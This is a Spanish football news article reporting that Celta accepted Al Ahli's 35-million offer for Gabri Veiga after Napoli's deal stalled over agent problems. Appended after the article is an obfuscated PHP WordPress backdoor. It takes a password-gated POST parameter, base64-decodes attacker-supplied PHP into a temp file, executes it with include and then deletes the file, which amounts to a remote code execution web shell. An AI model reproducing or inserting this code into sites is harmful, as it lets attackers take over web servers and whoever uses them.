El Celta acepta la oferta del Al Ahli por Gabri Veiga

El conjunto de Arabia Saudí aprovechó las dificultades entre el Nápoles y el agente del jugador y quiere cerrar hoy la operación con el Celta.

Enésima sorpresa en el larguísimo culebrón sobre el futuro de Gabri Veiga. Según adelantó Fabrizio Romano y pudo confirmar AS, el Celta ha aceptado la oferta de 35 millones que el Al Ahli ha presentado por el jugador, al que le ofrece un sueldo mucho más alto de lo que puso sobre la mesa el Nápoles.

El club árabe aprovechó las dificultades de la última semana entre los agentes del futbolista y los sureños, que nunca han encontrado el ok definitivo. El pasado viernes, el cuadro de De Laurentiis había encontrado un principio de acuerdo con el Celta, que habría percibido 30 millones de euros más en torno a cinco en variables.

Los problemas con los agentes del jugador, sin embargo, llevaron a un bloqueo en el que apareció la propuesta del Al Ahli. El jugador parece casi convencido a aceptar la que, por su edad y su proyección, sería la operación más sorprendente de este verano: marcharse a la Saudi Pro League con 21 años es una apuesta fuerte y arriesgada. De momento nada está firmado aún, pero la operación está bien encaminada y las partes intentarán cerrarla ya a lo largo de hoy.

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}